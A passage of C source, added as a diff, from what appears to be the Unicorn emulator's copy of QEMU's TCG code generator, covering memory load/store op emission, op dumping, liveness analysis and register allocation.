memop = tcg_canonicalize_memop(memop, 1, 0); + +#if TCG_TARGET_REG_BITS == 32 + if ((memop & MO_SIZE) < MO_64) { + tcg_gen_qemu_ld_i32(uc, TCGV_LOW(val), addr, idx, memop); + if (memop & MO_SIGN) { + tcg_gen_sari_i32(tcg_ctx, TCGV_HIGH(val), TCGV_LOW(val), 31); + } else { + tcg_gen_movi_i32(tcg_ctx, 
TCGV_HIGH(val), 0); + } + + check_exit_request(tcg_ctx); + return; + } +#endif + + *tcg_ctx->gen_opc_ptr++ = INDEX_op_qemu_ld_i64; + tcg_add_param_i64(tcg_ctx, val); + tcg_add_param_tl(tcg_ctx, addr); + *tcg_ctx->gen_opparam_ptr++ = memop; + *tcg_ctx->gen_opparam_ptr++ = idx; + + check_exit_request(tcg_ctx); +} + +void tcg_gen_qemu_st_i64(struct uc_struct *uc, TCGv_i64 val, TCGv addr, TCGArg idx, TCGMemOp memop) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + memop = tcg_canonicalize_memop(memop, 1, 1); + +#if TCG_TARGET_REG_BITS == 32 + if ((memop & MO_SIZE) < MO_64) { + tcg_gen_qemu_st_i32(uc, TCGV_LOW(val), addr, idx, memop); + check_exit_request(tcg_ctx); + return; + } +#endif + + *tcg_ctx->gen_opc_ptr++ = INDEX_op_qemu_st_i64; + tcg_add_param_i64(tcg_ctx, val); + tcg_add_param_tl(tcg_ctx, addr); + *tcg_ctx->gen_opparam_ptr++ = memop; + *tcg_ctx->gen_opparam_ptr++ = idx; + + check_exit_request(tcg_ctx); +} + +static void tcg_reg_alloc_start(TCGContext *s) +{ + int i; + TCGTemp *ts; + for(i = 0; i < s->nb_globals; i++) { + ts = &s->temps[i]; + if (ts->fixed_reg) { + ts->val_type = TEMP_VAL_REG; + } else { + ts->val_type = TEMP_VAL_MEM; + } + } + for(i = s->nb_globals; i < s->nb_temps; i++) { + ts = &s->temps[i]; + if (ts->temp_local) { + ts->val_type = TEMP_VAL_MEM; + } else { + ts->val_type = TEMP_VAL_DEAD; + } + ts->mem_allocated = 0; + ts->fixed_reg = 0; + } + for(i = 0; i < TCG_TARGET_NB_REGS; i++) { + s->reg_to_temp[i] = -1; + } +} + +static char *tcg_get_arg_str_idx(TCGContext *s, char *buf, int buf_size, + int idx) +{ + TCGTemp *ts; + + assert(idx >= 0 && idx < s->nb_temps); + ts = &s->temps[idx]; + if (idx < s->nb_globals) { + pstrcpy(buf, buf_size, ts->name); + } else { + if (ts->temp_local) + snprintf(buf, buf_size, "loc%d", idx - s->nb_globals); + else + snprintf(buf, buf_size, "tmp%d", idx - s->nb_globals); + } + return buf; +} + +char *tcg_get_arg_str_i32(TCGContext *s, char *buf, int buf_size, TCGv_i32 arg) +{ + return tcg_get_arg_str_idx(s, buf, 
buf_size, GET_TCGV_I32(arg)); +} + +char *tcg_get_arg_str_i64(TCGContext *s, char *buf, int buf_size, TCGv_i64 arg) +{ + return tcg_get_arg_str_idx(s, buf, buf_size, GET_TCGV_I64(arg)); +} + +/* Find helper name. */ +static inline const char *tcg_find_helper(TCGContext *s, uintptr_t val) +{ + const char *ret = NULL; + if (s->helpers) { + TCGHelperInfo *info = g_hash_table_lookup(s->helpers, (gpointer)val); + if (info) { + ret = info->name; + } + } + return ret; +} + +static const char * const cond_name[] = +{ +#ifdef _MSC_VER + "never", // TCG_COND_NEVER + "always", // TCG_COND_ALWAYS + "lt", // TCG_COND_LT + "ge", // TCG_COND_GE + "ltu", // TCG_COND_LTU + "geu", // TCG_COND_GEU + NULL, // n/a + NULL, // n/a + "eq", // TCG_COND_EQ + "ne", // TCG_COND_NE + "le", // TCG_COND_LE + "gt", // TCG_COND_GT + "leu", // TCG_COND_LEU + "gtu", // TCG_COND_GTU + NULL, // n/a + NULL, // n/a +#else + [TCG_COND_NEVER] = "never", + [TCG_COND_ALWAYS] = "always", + [TCG_COND_EQ] = "eq", + [TCG_COND_NE] = "ne", + [TCG_COND_LT] = "lt", + [TCG_COND_GE] = "ge", + [TCG_COND_LE] = "le", + [TCG_COND_GT] = "gt", + [TCG_COND_LTU] = "ltu", + [TCG_COND_GEU] = "geu", + [TCG_COND_LEU] = "leu", + [TCG_COND_GTU] = "gtu" +#endif +}; + +static const char * const ldst_name[] = +{ +#ifdef _MSC_VER + "ub", // MO_UB +# ifdef HOST_WORDS_BIGENDIAN + "beuw", // MO_BEUW + "beul", // MO_BEUL + "beq", // MO_BEQ + "sb", // MO_SB + "besw", // MO_BESW + "besl", // MO_BESL + NULL, // n/a + NULL, // n/a + "leuw", // MO_LEUW + "leul", // MO_LEUL + "leq", // MO_LEQ + NULL, // n/a + "lesw", // MO_LESW + "lesl", // MO_LESL + NULL, // n/a +# else // !HOST_WORDS_BIGENDIAN + "leuw", // MO_LEUW + "leul", // MO_LEUL + "leq", // MO_LEQ + "sb", // MO_SB + "lesw", // MO_LESW + "lesl", // MO_LESL + NULL, // n/a + NULL, // n/a + "beuw", // MO_BEUW + "beul", // MO_BEUL + "beq", // MO_BEQ + NULL, // n/a + "besw", // MO_BESW + "besl", // MO_BESL + NULL, // n/a +# endif // HOST_WORDS_BIGENDIAN + +#else //_MSC_VER + [MO_UB] = "ub", + 
[MO_SB] = "sb", + [MO_LEUW] = "leuw", + [MO_LESW] = "lesw", + [MO_LEUL] = "leul", + [MO_LESL] = "lesl", + [MO_LEQ] = "leq", + [MO_BEUW] = "beuw", + [MO_BESW] = "besw", + [MO_BEUL] = "beul", + [MO_BESL] = "besl", + [MO_BEQ] = "beq", +#endif // _MSC_VER +}; + +void tcg_dump_ops(TCGContext *s) +{ + const uint16_t *opc_ptr; + const TCGArg *args; + TCGArg arg; + TCGOpcode c; + int i, k, nb_oargs, nb_iargs, nb_cargs, first_insn; + const TCGOpDef *def; + char buf[128]; + + first_insn = 1; + opc_ptr = s->gen_opc_buf; + args = s->gen_opparam_buf; + while (opc_ptr < s->gen_opc_ptr) { + c = *opc_ptr++; + def = &s->tcg_op_defs[c]; + if (c == INDEX_op_debug_insn_start) { + uint64_t pc; +#if TARGET_LONG_BITS > TCG_TARGET_REG_BITS + pc = ((uint64_t)args[1] << 32) | args[0]; +#else + pc = args[0]; +#endif + if (!first_insn) { + printf("\n"); + } + printf(" ---- 0x%" PRIx64, pc); + first_insn = 0; + nb_oargs = def->nb_oargs; + nb_iargs = def->nb_iargs; + nb_cargs = def->nb_cargs; + } else if (c == INDEX_op_call) { + TCGArg arg; + + /* variable number of arguments */ + arg = *args++; + nb_oargs = arg >> 16; + nb_iargs = arg & 0xffff; + nb_cargs = def->nb_cargs; + + /* function name, flags, out args */ + printf(" %s %s,$0x%" TCG_PRIlx ",$%d", def->name, + tcg_find_helper(s, args[nb_oargs + nb_iargs]), + args[nb_oargs + nb_iargs + 1], nb_oargs); + for (i = 0; i < nb_oargs; i++) { + printf(",%s", tcg_get_arg_str_idx(s, buf, sizeof(buf), + args[i])); + } + for (i = 0; i < nb_iargs; i++) { + TCGArg arg = args[nb_oargs + i]; + const char *t = ""; + if (arg != TCG_CALL_DUMMY_ARG) { + t = tcg_get_arg_str_idx(s, buf, sizeof(buf), arg); + } + printf(",%s", t); + } + } else { + printf(" %s ", def->name); + if (c == INDEX_op_nopn) { + /* variable number of arguments */ + nb_cargs = *args; + nb_oargs = 0; + nb_iargs = 0; + } else { + nb_oargs = def->nb_oargs; + nb_iargs = def->nb_iargs; + nb_cargs = def->nb_cargs; + } + + k = 0; + for(i = 0; i < nb_oargs; i++) { + if (k != 0) { + printf(","); + 
} + printf("%s", tcg_get_arg_str_idx(s, buf, sizeof(buf), + args[k++])); + } + for(i = 0; i < nb_iargs; i++) { + if (k != 0) { + printf(","); + } + printf("%s", tcg_get_arg_str_idx(s, buf, sizeof(buf), + args[k++])); + } + switch (c) { + case INDEX_op_brcond_i32: + case INDEX_op_setcond_i32: + case INDEX_op_movcond_i32: + case INDEX_op_brcond2_i32: + case INDEX_op_setcond2_i32: + case INDEX_op_brcond_i64: + case INDEX_op_setcond_i64: + case INDEX_op_movcond_i64: + if (args[k] < ARRAY_SIZE(cond_name) && cond_name[args[k]]) { + printf(",%s", cond_name[args[k++]]); + } else { + printf(",$0x%" TCG_PRIlx, args[k++]); + } + i = 1; + break; + case INDEX_op_qemu_ld_i32: + case INDEX_op_qemu_st_i32: + case INDEX_op_qemu_ld_i64: + case INDEX_op_qemu_st_i64: + if (args[k] < ARRAY_SIZE(ldst_name) && ldst_name[args[k]]) { + printf(",%s", ldst_name[args[k++]]); + } else { + printf(",$0x%" TCG_PRIlx, args[k++]); + } + i = 1; + break; + default: + i = 0; + break; + } + for(; i < nb_cargs; i++) { + if (k != 0) { + printf(","); + } + arg = args[k++]; + printf("$0x%" TCG_PRIlx, arg); + } + } + printf("\n"); + args += nb_iargs + nb_oargs + nb_cargs; + } + printf("###########\n"); +} + +/* we give more priority to constraints with less registers */ +static int get_constraint_priority(const TCGOpDef *def, int k) +{ + const TCGArgConstraint *arg_ct; + + int i, n; + arg_ct = &def->args_ct[k]; + if (arg_ct->ct & TCG_CT_ALIAS) { + /* an alias is equivalent to a single register */ + n = 1; + } else { + if (!(arg_ct->ct & TCG_CT_REG)) + return 0; + n = 0; + for(i = 0; i < TCG_TARGET_NB_REGS; i++) { + if (tcg_regset_test_reg(arg_ct->u.regs, i)) + n++; + } + } + return TCG_TARGET_NB_REGS - n + 1; +} + +/* sort from highest priority to lowest */ +static void sort_constraints(TCGOpDef *def, int start, int n) +{ + int i, j, p1, p2, tmp; + + for(i = 0; i < n; i++) + def->sorted_args[start + i] = start + i; + if (n <= 1) + return; + for(i = 0; i < n - 1; i++) { + for(j = i + 1; j < n; j++) { + p1 = 
get_constraint_priority(def, def->sorted_args[start + i]); + p2 = get_constraint_priority(def, def->sorted_args[start + j]); + if (p1 < p2) { + tmp = def->sorted_args[start + i]; + def->sorted_args[start + i] = def->sorted_args[start + j]; + def->sorted_args[start + j] = tmp; + } + } + } +} + +void tcg_add_target_add_op_defs(TCGContext *s, const TCGTargetOpDef *tdefs) +{ + TCGOpcode op; + TCGOpDef *def; + const char *ct_str; + int i, nb_args; + + for(;;) { + if (tdefs->op == (TCGOpcode)-1) + break; + op = tdefs->op; + assert((unsigned)op < NB_OPS); + def = &s->tcg_op_defs[op]; +#if defined(CONFIG_DEBUG_TCG) + /* Duplicate entry in op definitions? */ + assert(!def->used); + def->used = 1; +#endif + nb_args = def->nb_iargs + def->nb_oargs; + for(i = 0; i < nb_args; i++) { + ct_str = tdefs->args_ct_str[i]; + /* Incomplete TCGTargetOpDef entry? */ + assert(ct_str != NULL); + tcg_regset_clear(def->args_ct[i].u.regs); + def->args_ct[i].ct = 0; + if (ct_str[0] >= '0' && ct_str[0] <= '9') { + int oarg; + oarg = ct_str[0] - '0'; + assert(oarg < def->nb_oargs); + assert(def->args_ct[oarg].ct & TCG_CT_REG); + /* TCG_CT_ALIAS is for the output arguments. The input + argument is tagged with TCG_CT_IALIAS. */ + def->args_ct[i] = def->args_ct[oarg]; + def->args_ct[oarg].ct = TCG_CT_ALIAS; + def->args_ct[oarg].alias_index = i; + def->args_ct[i].ct |= TCG_CT_IALIAS; + def->args_ct[i].alias_index = oarg; + } else { + for(;;) { + if (*ct_str == '\0') + break; + switch(*ct_str) { + case 'i': + def->args_ct[i].ct |= TCG_CT_CONST; + ct_str++; + break; + default: + if (target_parse_constraint(&def->args_ct[i], &ct_str) < 0) { + fprintf(stderr, "Invalid constraint '%s' for arg %d of operation '%s'\n", + ct_str, i, def->name); + exit(1); + } + } + } + } + } + + /* TCGTargetOpDef entry with too much information? 
*/ + assert(i == TCG_MAX_OP_ARGS || tdefs->args_ct_str[i] == NULL); + + /* sort the constraints (XXX: this is just an heuristic) */ + sort_constraints(def, 0, def->nb_oargs); + sort_constraints(def, def->nb_oargs, def->nb_iargs); + +#if 0 + { + int i; + + printf("%s: sorted=", def->name); + for(i = 0; i < def->nb_oargs + def->nb_iargs; i++) + printf(" %d", def->sorted_args[i]); + printf("\n"); + } +#endif + tdefs++; + } + +#if defined(CONFIG_DEBUG_TCG) + i = 0; + for (op = 0; op < ARRAY_SIZE(s->tcg_op_defs); op++) { + const TCGOpDef *def = &s->tcg_op_defs[op]; + if (def->flags & TCG_OPF_NOT_PRESENT) { + /* Wrong entry in op definitions? */ + if (def->used) { + fprintf(stderr, "Invalid op definition for %s\n", def->name); + i = 1; + } + } else { + /* Missing entry in op definitions? */ + if (!def->used) { + fprintf(stderr, "Missing op definition for %s\n", def->name); + i = 1; + } + } + } + if (i == 1) { + tcg_abort(); + } +#endif +} + +#ifdef USE_LIVENESS_ANALYSIS + +/* set a nop for an operation using 'nb_args' */ +static inline void tcg_set_nop(TCGContext *s, uint16_t *opc_ptr, + TCGArg *args, int nb_args) +{ + if (nb_args == 0) { + *opc_ptr = INDEX_op_nop; + } else { + *opc_ptr = INDEX_op_nopn; + args[0] = nb_args; + args[nb_args - 1] = nb_args; + } +} + +/* liveness analysis: end of function: all temps are dead, and globals + should be in memory. */ +static inline void tcg_la_func_end(TCGContext *s, uint8_t *dead_temps, + uint8_t *mem_temps) +{ + memset(dead_temps, 1, s->nb_temps); + memset(mem_temps, 1, s->nb_globals); + memset(mem_temps + s->nb_globals, 0, s->nb_temps - s->nb_globals); +} + +/* liveness analysis: end of basic block: all temps are dead, globals + and local temps should be in memory. 
*/ +static inline void tcg_la_bb_end(TCGContext *s, uint8_t *dead_temps, + uint8_t *mem_temps) +{ + int i; + + memset(dead_temps, 1, s->nb_temps); + memset(mem_temps, 1, s->nb_globals); + for(i = s->nb_globals; i < s->nb_temps; i++) { + mem_temps[i] = s->temps[i].temp_local; + } +} + +/* + Unicorn: for brcond, we should refresh liveness states for TCG globals +*/ +static inline void tcg_la_br_end(TCGContext *s, uint8_t *mem_temps) +{ + int i; + memset(mem_temps, 1, s->nb_globals); + for(i = s->nb_globals; i < s->nb_temps; i++) { + mem_temps[i] = s->temps[i].temp_local; + } +} + +/* Liveness analysis : update the opc_dead_args array to tell if a + given input arguments is dead. Instructions updating dead + temporaries are removed. */ +static void tcg_liveness_analysis(TCGContext *s) +{ + int i, op_index, nb_args, nb_iargs, nb_oargs, nb_ops; + TCGOpcode op, op_new, op_new2; + TCGArg *args, arg; + const TCGOpDef *def; + uint8_t *dead_temps, *mem_temps; + uint16_t dead_args; + uint8_t sync_args; + bool have_op_new2; + + s->gen_opc_ptr++; /* skip end */ + + nb_ops = s->gen_opc_ptr - s->gen_opc_buf; + + s->op_dead_args = tcg_malloc(s, nb_ops * sizeof(uint16_t)); + s->op_sync_args = tcg_malloc(s, nb_ops * sizeof(uint8_t)); + + dead_temps = tcg_malloc(s, s->nb_temps); + mem_temps = tcg_malloc(s, s->nb_temps); + tcg_la_func_end(s, dead_temps, mem_temps); + + args = s->gen_opparam_ptr; + op_index = nb_ops - 1; + while (op_index >= 0) { + op = s->gen_opc_buf[op_index]; + def = &s->tcg_op_defs[op]; + switch(op) { + case INDEX_op_call: + { + int call_flags; + + nb_args = args[-1]; + args -= nb_args; + arg = *args++; + nb_iargs = arg & 0xffff; + nb_oargs = arg >> 16; + call_flags = args[nb_oargs + nb_iargs + 1]; + + /* pure functions can be removed if their result is not + used */ + if (call_flags & TCG_CALL_NO_SIDE_EFFECTS) { + for (i = 0; i < nb_oargs; i++) { + arg = args[i]; + if (!dead_temps[arg] || mem_temps[arg]) { + goto do_not_remove_call; + } + } + tcg_set_nop(s, 
s->gen_opc_buf + op_index, + args - 1, nb_args); + } else { + do_not_remove_call: + + /* output args are dead */ + dead_args = 0; + sync_args = 0; + for (i = 0; i < nb_oargs; i++) { + arg = args[i]; + if (dead_temps[arg]) { + dead_args |= (1 << i); + } + if (mem_temps[arg]) { + sync_args |= (1 << i); + } + dead_temps[arg] = 1; + mem_temps[arg] = 0; + } + + if (!(call_flags & TCG_CALL_NO_READ_GLOBALS)) { + /* globals should be synced to memory */ + memset(mem_temps, 1, s->nb_globals); + } + if (!(call_flags & (TCG_CALL_NO_WRITE_GLOBALS | + TCG_CALL_NO_READ_GLOBALS))) { + /* globals should go back to memory */ + memset(dead_temps, 1, s->nb_globals); + } + + /* input args are live */ + for (i = nb_oargs; i < nb_iargs + nb_oargs; i++) { + arg = args[i]; + if (arg != TCG_CALL_DUMMY_ARG) { + if (dead_temps[arg]) { + dead_args |= (1 << i); + } + dead_temps[arg] = 0; + } + } + s->op_dead_args[op_index] = dead_args; + s->op_sync_args[op_index] = sync_args; + } + args--; + } + break; + case INDEX_op_debug_insn_start: + args -= def->nb_args; + break; + case INDEX_op_nopn: + nb_args = args[-1]; + args -= nb_args; + break; + case INDEX_op_discard: + args--; + /* mark the temporary as dead */ + dead_temps[args[0]] = 1; + mem_temps[args[0]] = 0; + break; + case INDEX_op_end: + break; + + case INDEX_op_add2_i32: + op_new = INDEX_op_add_i32; + goto do_addsub2; + case INDEX_op_sub2_i32: + op_new = INDEX_op_sub_i32; + goto do_addsub2; + case INDEX_op_add2_i64: + op_new = INDEX_op_add_i64; + goto do_addsub2; + case INDEX_op_sub2_i64: + op_new = INDEX_op_sub_i64; + do_addsub2: + args -= 6; + nb_iargs = 4; + nb_oargs = 2; + /* Test if the high part of the operation is dead, but not + the low part. The result can be optimized to a simple + add or sub. This happens often for x86_64 guest when the + cpu mode is set to 32 bit. 
*/ + if (dead_temps[args[1]] && !mem_temps[args[1]]) { + if (dead_temps[args[0]] && !mem_temps[args[0]]) { + goto do_remove; + } + /* Create the single operation plus nop. */ + s->gen_opc_buf[op_index] = op = op_new; + args[1] = args[2]; + args[2] = args[4]; + assert(s->gen_opc_buf[op_index + 1] == INDEX_op_nop); + tcg_set_nop(s, s->gen_opc_buf + op_index + 1, args + 3, 3); + /* Fall through and mark the single-word operation live. */ + nb_iargs = 2; + nb_oargs = 1; + } + goto do_not_remove; + + case INDEX_op_mulu2_i32: + op_new = INDEX_op_mul_i32; + op_new2 = INDEX_op_muluh_i32; + have_op_new2 = TCG_TARGET_HAS_muluh_i32; + goto do_mul2; + case INDEX_op_muls2_i32: + op_new = INDEX_op_mul_i32; + op_new2 = INDEX_op_mulsh_i32; + have_op_new2 = TCG_TARGET_HAS_mulsh_i32; + goto do_mul2; + case INDEX_op_mulu2_i64: + op_new = INDEX_op_mul_i64; + op_new2 = INDEX_op_muluh_i64; + have_op_new2 = TCG_TARGET_HAS_muluh_i64; + goto do_mul2; + case INDEX_op_muls2_i64: + op_new = INDEX_op_mul_i64; + op_new2 = INDEX_op_mulsh_i64; + have_op_new2 = TCG_TARGET_HAS_mulsh_i64; + goto do_mul2; + do_mul2: + args -= 4; + nb_iargs = 2; + nb_oargs = 2; + if (dead_temps[args[1]] && !mem_temps[args[1]]) { + if (dead_temps[args[0]] && !mem_temps[args[0]]) { + /* Both parts of the operation are dead. */ + goto do_remove; + } + /* The high part of the operation is dead; generate the low. */ + s->gen_opc_buf[op_index] = op = op_new; + args[1] = args[2]; + args[2] = args[3]; + } else if (have_op_new2 && dead_temps[args[0]] + && !mem_temps[args[0]]) { + /* The low part of the operation is dead; generate the high. */ + s->gen_opc_buf[op_index] = op = op_new2; + args[0] = args[1]; + args[1] = args[2]; + args[2] = args[3]; + } else { + goto do_not_remove; + } + assert(s->gen_opc_buf[op_index + 1] == INDEX_op_nop); + tcg_set_nop(s, s->gen_opc_buf + op_index + 1, args + 3, 1); + /* Mark the single-word operation live. 
*/ + nb_oargs = 1; + goto do_not_remove; + + default: + /* XXX: optimize by hardcoding common cases (e.g. triadic ops) */ + args -= def->nb_args; + nb_iargs = def->nb_iargs; + nb_oargs = def->nb_oargs; + + /* Test if the operation can be removed because all + its outputs are dead. We assume that nb_oargs == 0 + implies side effects */ + if (!(def->flags & TCG_OPF_SIDE_EFFECTS) && nb_oargs != 0) { + for(i = 0; i < nb_oargs; i++) { + if (args[i] >= TCG_MAX_TEMPS) { + continue; + } + arg = args[i]; + if (!dead_temps[arg] || mem_temps[arg]) { + goto do_not_remove; + } + } + do_remove: + tcg_set_nop(s, s->gen_opc_buf + op_index, args, def->nb_args); +#ifdef CONFIG_PROFILER + s->del_op_count++; +#endif + } else { + do_not_remove: + + /* output args are dead */ + dead_args = 0; + sync_args = 0; + for(i = 0; i < nb_oargs; i++) { + arg = args[i]; + if (dead_temps[arg]) { + dead_args |= (1 << i); + } + if (mem_temps[arg]) { + sync_args |= (1 << i); + } + dead_temps[arg] = 1; + mem_temps[arg] = 0; + } + + /* if end of basic block, update */ + if (def->flags & TCG_OPF_BB_END) { + // Unicorn: do not optimize dead temps on brcond, + // this causes problem because check_exit_request() inserts + // brcond instruction in the middle of the TB, + // which incorrectly flags end-of-block + if (op != INDEX_op_brcond_i32) + tcg_la_bb_end(s, dead_temps, mem_temps); + // Unicorn: we do not touch dead temps for brcond, + // but we should refresh TCG globals In-Memory states, + // otherwise, important CPU states(especially conditional flags) might be forgotten, + // result in wrongly generated host code that run into wrong branch. 
+ // Refer to https://github.com/unicorn-engine/unicorn/issues/287 for further information + else + tcg_la_br_end(s, mem_temps); + } else if (def->flags & TCG_OPF_SIDE_EFFECTS) { + /* globals should be synced to memory */ + memset(mem_temps, 1, s->nb_globals); + } + + /* input args are live */ + for(i = nb_oargs; i < nb_oargs + nb_iargs; i++) { + arg = args[i]; + if (dead_temps[arg]) { + dead_args |= (1 << i); + } + dead_temps[arg] = 0; + } + s->op_dead_args[op_index] = dead_args; + s->op_sync_args[op_index] = sync_args; + } + break; + } + op_index--; + } + + if (args != s->gen_opparam_buf) { + tcg_abort(); + } +} +#else +/* dummy liveness analysis */ +static void tcg_liveness_analysis(TCGContext *s) +{ + int nb_ops; + nb_ops = s->gen_opc_ptr - s->gen_opc_buf; + + s->op_dead_args = tcg_malloc(s, nb_ops * sizeof(uint16_t)); + memset(s->op_dead_args, 0, nb_ops * sizeof(uint16_t)); + s->op_sync_args = tcg_malloc(s, nb_ops * sizeof(uint8_t)); + memset(s->op_sync_args, 0, nb_ops * sizeof(uint8_t)); +} +#endif + +#ifndef NDEBUG +static void dump_regs(TCGContext *s) +{ + TCGTemp *ts; + int i; + char buf[64]; + + for(i = 0; i < s->nb_temps; i++) { + ts = &s->temps[i]; + printf(" %10s: ", tcg_get_arg_str_idx(s, buf, sizeof(buf), i)); + switch(ts->val_type) { + case TEMP_VAL_REG: + printf("%s", tcg_target_reg_names[ts->reg]); + break; + case TEMP_VAL_MEM: + printf("%d(%s)", (int)ts->mem_offset, tcg_target_reg_names[ts->mem_reg]); + break; + case TEMP_VAL_CONST: + printf("$0x%" TCG_PRIlx, ts->val); + break; + case TEMP_VAL_DEAD: + printf("D"); + break; + default: + printf("???"); + break; + } + printf("\n"); + } + + for(i = 0; i < TCG_TARGET_NB_REGS; i++) { + if (s->reg_to_temp[i] >= 0) { + printf("%s: %s\n", + tcg_target_reg_names[i], + tcg_get_arg_str_idx(s, buf, sizeof(buf), s->reg_to_temp[i])); + } + } +} + +static void check_regs(TCGContext *s) +{ + int reg, k; + TCGTemp *ts; + char buf[64]; + + for(reg = 0; reg < TCG_TARGET_NB_REGS; reg++) { + k = s->reg_to_temp[reg]; + 
if (k >= 0) { + ts = &s->temps[k]; + if (ts->val_type != TEMP_VAL_REG || + ts->reg != reg) { + printf("Inconsistency for register %s:\n", + tcg_target_reg_names[reg]); + goto fail; + } + } + } + for(k = 0; k < s->nb_temps; k++) { + ts = &s->temps[k]; + if (ts->val_type == TEMP_VAL_REG && + !ts->fixed_reg && + s->reg_to_temp[ts->reg] != k) { + printf("Inconsistency for temp %s:\n", + tcg_get_arg_str_idx(s, buf, sizeof(buf), k)); + fail: + printf("reg state:\n"); + dump_regs(s); + tcg_abort(); + } + } +} +#endif + +static void temp_allocate_frame(TCGContext *s, int temp) +{ + TCGTemp *ts; + ts = &s->temps[temp]; +#if !(defined(__sparc__) && TCG_TARGET_REG_BITS == 64) + /* Sparc64 stack is accessed with offset of 2047 */ + s->current_frame_offset = (s->current_frame_offset + + (tcg_target_long)sizeof(tcg_target_long) - 1) & + ~(sizeof(tcg_target_long) - 1); +#endif + if (s->current_frame_offset + (tcg_target_long)sizeof(tcg_target_long) > + s->frame_end) { + tcg_abort(); + } + ts->mem_offset = s->current_frame_offset; + ts->mem_reg = s->frame_reg; + ts->mem_allocated = 1; + s->current_frame_offset += sizeof(tcg_target_long); +} + +/* sync register 'reg' by saving it to the corresponding temporary */ +static inline void tcg_reg_sync(TCGContext *s, int reg) +{ + TCGTemp *ts; + int temp; + + temp = s->reg_to_temp[reg]; + ts = &s->temps[temp]; + assert(ts->val_type == TEMP_VAL_REG); + if (!ts->mem_coherent && !ts->fixed_reg) { + if (!ts->mem_allocated) { + temp_allocate_frame(s, temp); + } + tcg_out_st(s, ts->type, reg, ts->mem_reg, ts->mem_offset); + } + ts->mem_coherent = 1; +} + +/* free register 'reg' by spilling the corresponding temporary if necessary */ +static void tcg_reg_free(TCGContext *s, int reg) +{ + int temp; + + temp = s->reg_to_temp[reg]; + if (temp != -1) { + tcg_reg_sync(s, reg); + s->temps[temp].val_type = TEMP_VAL_MEM; + s->reg_to_temp[reg] = -1; + } +} + +/* Allocate a register belonging to reg1 & ~reg2 */ +static int tcg_reg_alloc(TCGContext *s, 
TCGRegSet reg1, TCGRegSet reg2) +{ + int i, reg; + TCGRegSet reg_ct; + + tcg_regset_andnot(reg_ct, reg1, reg2); + + /* first try free registers */ + for(i = 0; i < ARRAY_SIZE(tcg_target_reg_alloc_order); i++) { + reg = tcg_target_reg_alloc_order[i]; + if (tcg_regset_test_reg(reg_ct, reg) && s->reg_to_temp[reg] == -1) + return reg; + } + + /* XXX: do better spill choice */ + for(i = 0; i < ARRAY_SIZE(tcg_target_reg_alloc_order); i++) { + reg = tcg_target_reg_alloc_order[i]; + if (tcg_regset_test_reg(reg_ct, reg)) { + tcg_reg_free(s, reg); + return reg; + } + } + + tcg_abort(); +} + +/* mark a temporary as dead. */ +static inline void temp_dead(TCGContext *s, int temp) +{ + TCGTemp *ts; + + ts = &s->temps[temp]; + if (!ts->fixed_reg) { + if (ts->val_type == TEMP_VAL_REG) { + s->reg_to_temp[ts->reg] = -1; + } + if (temp < s->nb_globals || ts->temp_local) { + ts->val_type = TEMP_VAL_MEM; + } else { + ts->val_type = TEMP_VAL_DEAD; + } + } +} + +/* sync a temporary to memory. 'allocated_regs' is used in case a + temporary registers needs to be allocated to store a constant. */ +static inline void temp_sync(TCGContext *s, int temp, TCGRegSet allocated_regs) +{ + TCGTemp *ts; + + ts = &s->temps[temp]; + if (!ts->fixed_reg) { + switch(ts->val_type) { + case TEMP_VAL_CONST: + ts->reg = tcg_reg_alloc(s, (TCGRegSet)s->tcg_target_available_regs[ts->type], + allocated_regs); + ts->val_type = TEMP_VAL_REG; + s->reg_to_temp[ts->reg] = temp; + ts->mem_coherent = 0; + tcg_out_movi(s, ts->type, ts->reg, ts->val); + /* fallthrough*/ + case TEMP_VAL_REG: + tcg_reg_sync(s, ts->reg); + break; + case TEMP_VAL_DEAD: + case TEMP_VAL_MEM: + break; + default: + tcg_abort(); + } + } +} + +/* save a temporary to memory. 'allocated_regs' is used in case a + temporary registers needs to be allocated to store a constant. 
*/ +static inline void temp_save(TCGContext *s, int temp, TCGRegSet allocated_regs) +{ +#ifdef USE_LIVENESS_ANALYSIS + /* The liveness analysis already ensures that globals are back + in memory. Keep an assert for safety. */ + assert(s->temps[temp].val_type == TEMP_VAL_MEM || s->temps[temp].fixed_reg); +#else + temp_sync(s, temp, allocated_regs); + temp_dead(s, temp); +#endif +} + +/* save globals to their canonical location and assume they can be + modified by the following code. 'allocated_regs' is used in case a + temporary register needs to be allocated to store a constant. */ +static void save_globals(TCGContext *s, TCGRegSet allocated_regs) +{ + int i; + + for(i = 0; i < s->nb_globals; i++) { + temp_save(s, i, allocated_regs); + } +} + +/* sync globals to their canonical location and assume they can be + read by the following code. 'allocated_regs' is used in case a + temporary register needs to be allocated to store a constant. */ +static void sync_globals(TCGContext *s, TCGRegSet allocated_regs) +{ + int i; + + for (i = 0; i < s->nb_globals; i++) { +#ifdef USE_LIVENESS_ANALYSIS + assert(s->temps[i].val_type != TEMP_VAL_REG || s->temps[i].fixed_reg || + s->temps[i].mem_coherent); +#else + temp_sync(s, i, allocated_regs); +#endif + } +} + +/* at the end of a basic block, we assume all temporaries are dead and + all globals are stored at their canonical location. */ +static void tcg_reg_alloc_bb_end(TCGContext *s, TCGRegSet allocated_regs) +{ + TCGTemp *ts; + int i; + + for(i = s->nb_globals; i < s->nb_temps; i++) { + ts = &s->temps[i]; + if (ts->temp_local) { + temp_save(s, i, allocated_regs); + } else { +#ifdef USE_LIVENESS_ANALYSIS + /* The liveness analysis already ensures that temps are dead. + Keep an assert for safety. 
*/ + assert(ts->val_type == TEMP_VAL_DEAD); +#else + temp_dead(s, i); +#endif + } + } + + save_globals(s, allocated_regs); +} + +#define IS_DEAD_ARG(n) ((dead_args >> (n)) & 1) +#define NEED_SYNC_ARG(n) ((sync_args >> (n)) & 1) + +static void tcg_reg_alloc_movi(TCGContext *s, const TCGArg *args, + uint16_t dead_args, uint8_t sync_args) +{ + TCGTemp *ots; + tcg_target_ulong val; + + ots = &s->temps[args[0]]; + val = args[1]; + + if (ots->fixed_reg) { + /* for fixed registers, we do not do any constant + propagation */ + tcg_out_movi(s, ots->type, ots->reg, val); + } else { + /* The movi is not explicitly generated here */ + if (ots->val_type == TEMP_VAL_REG) + s->reg_to_temp[ots->reg] = -1; + ots->val_type = TEMP_VAL_CONST; + ots->val = val; + } + if (NEED_SYNC_ARG(0)) { + temp_sync(s, args[0], s->reserved_regs); + } + if (IS_DEAD_ARG(0)) { + temp_dead(s, args[0]); + } +} + +static void tcg_reg_alloc_mov(TCGContext *s, const TCGOpDef *def, + const 